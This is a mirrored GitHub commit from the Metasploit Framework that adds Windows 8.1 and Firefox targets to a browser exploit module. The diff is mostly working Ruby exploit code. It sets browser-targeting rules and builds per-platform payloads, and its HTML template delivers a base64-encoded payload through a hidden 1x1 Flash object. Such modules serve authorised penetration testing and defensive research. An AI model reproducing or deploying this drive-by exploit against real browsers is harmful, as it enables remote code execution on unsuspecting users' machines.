mirror of
https://github.com/rapid7/metasploit-framework
synced 2024-07-18 18:31:41 +02:00
Add more targets
This commit is contained in:
parent
4ee0a1438c
commit
ab68d8429b
Binary file not shown.
@ -8,7 +8,6 @@ require 'msf/core'
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::Powershell
|
||||
include Msf::Exploit::Remote::BrowserExploitServer
|
||||
|
||||
def initialize(info={})
|
||||
@ -40,20 +39,21 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
{
|
||||
'DisableNops' => true
|
||||
},
|
||||
'Platform' => ['win', 'unix'],
|
||||
'Arch' => [ARCH_X86, ARCH_CMD],
|
||||
'Platform' => ['win', 'linux'],
|
||||
'Arch' => [ARCH_X86],
|
||||
'BrowserRequirements' =>
|
||||
{
|
||||
:source => /script|headers/i,
|
||||
:arch => ARCH_X86,
|
||||
:os_name => lambda do |os|
|
||||
os =~ OperatingSystems::Match::LINUX ||
|
||||
os =~ OperatingSystems::Match::WINDOWS_7
|
||||
os =~ OperatingSystems::Match::WINDOWS_7 ||
|
||||
os =~ OperatingSystems::Match::WINDOWS_81
|
||||
end,
|
||||
:ua_name => lambda do |ua|
|
||||
case target.name
|
||||
when 'Windows'
|
||||
return true if ua == Msf::HttpClients::IE
|
||||
return true if [Msf::HttpClients::IE, Msf::HttpClients::FF].include?(ua)
|
||||
when 'Linux'
|
||||
return true if ua == Msf::HttpClients::FF
|
||||
end
|
||||
@ -75,14 +75,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
[
|
||||
[ 'Windows',
|
||||
{
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86
|
||||
'Platform' => 'win'
|
||||
}
|
||||
],
|
||||
[ 'Linux',
|
||||
{
|
||||
'Platform' => 'unix',
|
||||
'Arch' => ARCH_CMD
|
||||
'Platform' => 'linux'
|
||||
}
|
||||
]
|
||||
],
|
||||
@ -112,15 +110,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
def exploit_template(cli, target_info)
|
||||
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
|
||||
target_payload = get_payload(cli, target_info)
|
||||
b64_payload = Rex::Text.encode_base64(target_payload)
|
||||
os_name = target_info[:os_name]
|
||||
|
||||
if target.name =~ /Windows/
|
||||
target_payload = get_payload(cli, target_info)
|
||||
psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
|
||||
b64_payload = Rex::Text.encode_base64(psh_payload)
|
||||
platform_id = 'win'
|
||||
elsif target.name =~ /Linux/
|
||||
target_payload = get_payload(cli, target_info.merge(arch: ARCH_CMD))
|
||||
b64_payload = Rex::Text.encode_base64(target_payload)
|
||||
platform_id = 'linux'
|
||||
end
|
||||
|
||||
@ -129,9 +125,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
|
||||
<param name="movie" value="<%=swf_random%>" />
|
||||
<param name="allowScriptAccess" value="always" />
|
||||
<param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>" />
|
||||
<param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
|
||||
<param name="Play" value="true" />
|
||||
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>" Play="true"/>
|
||||
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
|
||||
</object>
|
||||
</body>
|
||||
</html>
|
||||
|
Loading…
Reference in New Issue
Block a user